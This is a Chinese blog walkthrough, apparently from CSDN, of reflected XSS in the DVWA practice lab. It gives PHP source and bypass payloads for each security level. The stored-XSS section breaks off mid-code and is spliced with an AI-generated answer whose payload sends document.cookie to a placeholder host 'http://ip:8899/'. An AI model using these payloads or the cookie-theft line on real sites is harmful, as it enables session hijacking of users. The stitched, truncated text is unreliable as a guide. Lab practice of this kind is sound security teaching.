DVWA靶场XSS三种类型漏洞练习

本文详细介绍了DVWA靶场中的反射型、存储型和DOM型XSS漏洞,涵盖从低到高四个安全等级的实战练习,包括payload的构造与绕过策略,并总结了常见的XSS防护函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

反射型XSS(非持久性)

反射型

【low】

后台码源:

<?php
    header ("X-XSS-Protection: 0");
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
       // Feedback for end user
       echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
    }
?>

观察到程序并没有对用户输入的name进行任何的过滤操作,那么我们直接输入<script>alert('XSS')</script>即可观察到弹窗,从而验证XSS漏洞的存在。
在这里插入图片描述

可尝试其他操作,直接获取Cookie值,输入<script>alert(document.cookie)</script> ,结果如下:
在这里插入图片描述

【Medium】

将系统的安全等级调为Medium,然后输入刚才的payload:<script>alert('XSS')</script> ,发现已经无法正常发生弹窗了:
在这里插入图片描述

后台源码:

<?php
    header ("X-XSS-Protection: 0");
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
       // Get input
       $name = str_replace( '<script>', '', $_GET[ 'name' ] );
       // Feedback for end user
      echo "<pre>Hello ${name}</pre>";
   }
?>

在将获取到的name值的时候,str_replace()函数将name值中的<script>标签转化为空。然后再将name值的结果输出,所以当我们再次使用low级别的payload的时候我们的<script>标签被过滤掉。但是这个函数区分大小写。所以当我们使用low级别中的payload大写的时候,一样可以绕过它的过滤。我们试一下:Payload:<SCRIPT>alert('XSS')</SCRIPT>
在这里插入图片描述

【High】

后台码源:

<?php
   header ("X-XSS-Protection: 0");
   // Is there any input?
   if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
        // Get input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
       // Feedback for end user
       echo "<pre>Hello ${name}</pre>";
   }
?>

观察到使用了正则表达式来过滤。preg_replace()函数,将包含<script的字符,不管大小写,不管后面跟着1个或多个与之相同的字符都转换为空。那么我们就不能使用大小写绕过和重写的方法来绕过了。
虽然无法使用<script>标签注入XSS代码,但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。这样就会避免出现<script>标签被正则表达式匹配到。
我们可以使用以下Payload:

<img src=1 onerror=alert(1)>

在这里插入图片描述标签是添加一张图片。src,指定图片的url,onerror是指定加载图片时如果出现错误则要执行的事件。这里我们的图片url肯定是错误的,这个弹窗事件也必会执行。
在这里插入图片描述

【Impossible】

后台码源:

<?php
   // Is there any input?
   if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
       // Check Anti-CSRF token
       checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
       // Get input
       $name = htmlspecialchars( $_GET[ 'name' ] );
       // Feedback for end user
       echo "<pre>Hello ${name}</pre>";
   }
   // Generate Anti-CSRF token
   generateSessionToken();
?>

这个很难做到弹框。里面处理$_GET[‘name’]的值得时候利用了函数htmlspecialchars(),将值里面的预定义函数,都变成html实体。
(在php中,htmlspecialchars()函数是使用来把一些预定义的字符转换为HTML实体,返回转换后的新字符串,原字符串不变。)

被转换的预定义的字符有:
&:转换为&amp;
":转换为&quot;
':转换为成为 '
<:转换为&lt
>:转换为&gt;

存储型XSS(持久性)

【Low】

后台码源:

<?php
  if( isset( $_POST[ 'btnSign' ] ) ) {
   
    // Get input
    $message = trim(
DVWA(Damn Vulnerable Web Application)是一个用于测试和练习Web应用程序安全漏洞靶场XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,使得网站在用户端执行这些脚本,从而获取用户敏感信息或进行其他攻击行为。 为了在DVWA靶场中完成XSS通关,你可以尝试以下步骤: 1. 注入脚本:在输入框或者参数中注入恶意脚本代码,比如上面提到的payload,如<img src=x οnerrοr=document.write('<img src="http://ip:8899/' document.cookie '"/>')>。 2. 触发脚本执行:提交注入的脚本,使得网站后端将其返回到前端,并在用户端执行。 3. 获取结果:当脚本执行时,它会将用户的Cookie数据发送到指定的服务器上(http://ip:8899/)。 请注意,这是一种漏洞攻击示例,请在授权范围内使用,并遵循道德规范。在实际应用中,网站开发人员应该采取相应的安全措施来防止XSS攻击,例如输入验证、输出编码等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA通关--反射型XSSXSS (Reflected))](https://blog.csdn.net/elephantxiang/article/details/111146085)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWA靶场xss通关笔记,详解带截图](https://blog.csdn.net/AboutLzs/article/details/123631604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值